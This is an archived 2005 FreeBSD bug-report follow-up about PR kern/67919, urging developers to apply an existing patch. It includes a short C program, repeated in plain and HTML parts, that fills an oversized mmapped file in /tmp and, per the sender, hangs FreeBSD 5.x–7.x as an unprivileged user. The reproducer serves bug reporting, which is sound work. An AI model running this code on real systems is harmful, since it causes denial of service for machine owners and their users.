kern/67919: Why nobody take serious to fix this bug?
Cai, Quanqing
caiquanqing at gmail.com
Sun Oct 30 23:20:14 PST 2005
The following reply was made to PR kern/67919; it has been noted by GNATS.
From: "Cai, Quanqing" <caiquanqing at gmail.com>
To: freebsd-current at freebsd.org, bug-followup at FreeBSD.org
Cc: Igor Sysoev <is at rambler-co.ru>, Edwin Groothuis <edwin at mavetju.org>,
Uwe Doering <gemini at geminix.org>
Subject: Re: kern/67919: Why nobody take serious to fix this bug?
Date: Sun, 30 Oct 2005 21:28:22 -0800
------=_Part_29858_5728121.1130736502398
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html
After I read all messages and related links, I feel so frustrating, why
nobody take serious to fix this bug even we have a patch for it? I can
repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System
goes no response so I have to power cycle it. The patch made by Uwe Doering
actually works well. This bug looks like a security hole to me:( If you guy=
s
don't like this patch, please give out a reason and come out a better patch
or solution.
For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you
have to increase FILELEN to a size greater than your /tmp partition:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/mman.h>
#define FILENAME "/tmp/test" /* where to put the test file */
#define FILELEN 710 /* test file length in MB */
main()
{
int fd;
size_t len;
char *buf, *p, *lim;
len =3D FILELEN * 1024 * 1024;
if ((fd =3D open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) =3D=3D -1)
err(2, "open() failed");
if (ftruncate(fd, len) =3D=3D -1)
err(2, "ftruncate() failed");
buf =3D mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
if (buf =3D=3D MAP_FAILED)
err(2, "mmap() failed");
(void)close(fd);
for (p =3D buf, lim =3D p + len; p < lim; p +=3D 4096)
*p =3D '0';
if (munmap(buf, len) =3D=3D -1)
err(2, "munmap() failed");
exit(0);
}
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Cai, Quanqing
------=_Part_29858_5728121.1130736502398
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Today I happened to read this message on freebsd-stable:
<a href=3D"http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/0=
19086.html">http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/=
019086.html</a><br>
<br>
After I read all messages and related links, I feel so frustrating, why
nobody take serious to fix this bug even we have a patch for it? I can
repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user!
System goes no response so I have to power cycle it. The patch made by
Uwe Doering actually works well. This bug looks like a security hole to
me:( If you guys don't like this patch, please give out a reason and
come out a better patch or solution.<br>
<br>
For impatience, you can run this to crush your system(7.x, 6.x, 5.x),
you have to increase FILELEN to a size greater than your /tmp partition:<br=
>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
#include <stdio.h><br>
#include <fcntl.h><br>
#include <unistd.h><br>
#include <err.h><br>
#include <sys/types.h><br>
#include <sys/mman.h><br>
<br>
#define FILENAME "/tmp/test&=
quot; /* where to put the test file */<br>
#define FILELEN
710
/* test file length in MB */<br>
<br>
main()<br>
{<br>
int fd;<br>
size_t len;<br>
char *buf, *p, *lim;<br>
<br>
len =3D FILELEN * 1024 * 1024;<b=
r>
<br>
if ((fd =3D open(FILENAME, O_RDW=
R|O_CREAT|O_TRUNC, 0666)) =3D=3D -1)<br>
&nb=
sp; err(2, "open() failed");<br>
<br>
if (ftruncate(fd, len) =3D=3D -1=
)<br>
&nb=
sp; err(2, "ftruncate() failed");<br>
<br>
buf =3D mmap(NULL, len, PROT_WRI=
TE, MAP_SHARED, fd, 0);<br>
if (buf =3D=3D MAP_FAILED)<br>
&nb=
sp; err(2, "mmap() failed");<br>
(void)close(fd);<br>
<br>
for (p =3D buf, lim =3D p + len;=
p < lim; p +=3D 4096)<br>
&nb=
sp; *p =3D '0';<br>
<br>
if (munmap(buf, len) =3D=3D -1)<=
br>
&nb=
sp; err(2, "munmap() failed");<br>
<br>
exit(0);<br>
}<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
<br>
<br>
Cai, Quanqing<br>
------=_Part_29858_5728121.1130736502398--
More information about the freebsd-bugs
mailing list